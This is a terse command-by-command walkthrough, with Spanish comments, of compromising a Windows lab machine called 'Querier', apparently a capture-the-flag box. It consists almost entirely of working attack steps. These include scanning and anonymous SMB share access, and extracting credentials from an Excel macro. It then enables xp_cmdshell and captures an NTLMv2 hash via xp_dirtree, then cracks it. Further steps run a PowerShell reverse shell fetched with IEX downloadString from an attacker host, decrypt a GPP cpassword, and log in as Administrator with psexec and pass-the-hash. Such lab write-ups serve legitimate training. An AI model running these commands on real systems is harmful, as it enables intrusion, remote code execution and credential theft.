Querier

ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services

crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP>	<DOMAIN>

smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -u 'null'
smbmap -H <IP> -u none
smbmap -H <IP> --no-banner

smbmap -H <IP> -u 'null' -r Reports
smbclient //<IP>/Reports -N
dir
get "Currency Volume Report.xlsm"
exit

libreoffice "Currency Volume Report.xlsm"
# INSTALAR OLEVBA
apt install python2-oletools
olevba2 "Currency Volume Report.xlsm"
olevba2 -c "Currency Volume Report.xlsm"
# CREDENCIALES OBTENIDAS EN LA CADENA DE CONEXIÓN

nvim credentials.txt
reporting:<PASSWORD>

crackmapexec smb <IP> -u reporting -p <PASSWORD>
crackmapexec smb <IP> -u reporting -p <PASSWORD> -d WORKGROUP
crackmapexec winrm <IP> -u reporting -p <PASSWORD> -d WORKGROUP

impacket-mssqlclient.py WORKGROUP/reporting@<IP> -windows-auth
<PASSWORD>

xp_cmdshell "whoami"
# LISTAR OPCIONES AVANZADAS
sp_configure "show advanced options", 1
# HABILITAR XP_CMDSHELL
sp_configure "xp_cmdshell", 1

# MÁQUINA ATACANTE
smbserver.py smbFolder $(pwd) -smb2support

# MÁQUINA VÍCTIMA
xp_dirtree "\\<IP>\smbFolder\"

# HASH NTLMv2 CAPTURADO

echo <HASH> > hash
john -w:/usr/share/wordlists/rockyou.txt hash
# HASH CRACKED > PASSWORD_2 + USER

nvim credentials.txt
reporting:<PASSWORD>
mssql-svc:<PASSWORD_2>

crackmapexec smb <IP> -u mssql-svc -p <PASSWORD_2> -d WORKGROUP
crackmapexec winrm <IP> -u mssql-svc -p <PASSWORD_2> -d WORKGROUP

impacket-mssqlclient.py WORKGROUP/mssql-svc@<IP> -windows-auth
<PASSWORD>

xp_cmdshell "whoami"
# LISTAR OPCIONES AVANZADAS
sp_configure "show advanced options", 1
reconfigure
# HABILITAR XP_CMDSHELL
sp_configure "xp_cmdshell", 1
reconfigure
xp_cmdshell "whoami"

# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
mv Invoke-PowerShellTcp.ps1 ps.ps1
nvim ps.ps1
# AGREGAR EN LA ÚLTIMA LINEA DEL SCRIPT
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
# COMPARTO SERVICIO HTTP PYTHON
python3 -m http.server 80
# CREAR UN LISTENER CON RLWRAP + NC
rlwrap nc -nlvp <PORT>

# MÁQUINA VÍCTIMA
xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString(\"http://<IP>/ps.ps1\")"

# CONSOLA INTERACTIVA
whoami

cmd /c dir /r /s user.txt
type C:\Users\mssql-svc\Desktop\user.txt

whoami /priv
whoami /all
net group
net user
net user mssql-svc

# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
nvim PowerUp.ps1
# AGREGAR EN LA ÚLTIMA LINEA DEL SCRIPT
Invoke-AllChecks
# COMPARTO SERVICIO HTTP PYTHON
python3 -m http.server 80

# MÁQUINA VÍCTIMA
IEX(New-Object Net.WebClient).downloadString('http://<IP>/PowerUp.ps1')

# OBTENEMOS PASSWORD DEL USUARIO ADMINISTRATOR

type "C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<CPASSWORD>

gpp-decrypt '<CPASSWORD>'
<A_PASSWORD>

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP --sam

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP
crackmapexec winrm <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP

# ACCESO CON EVIL-WINRM
evil-winrm -i <IP> -u 'Administrator' -p '<A_PASSWORD>'
whoami

# ACCESO CON PSEXEC
psexec.py WORKGROUP/Administrator@<IP> cmd.exe
whoami

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP --sam
psexec.py WORKGROUP/Administrator@<IP> -hashes <HASH>
whoami

type C:\Users\Administrator\Desktop\root.txt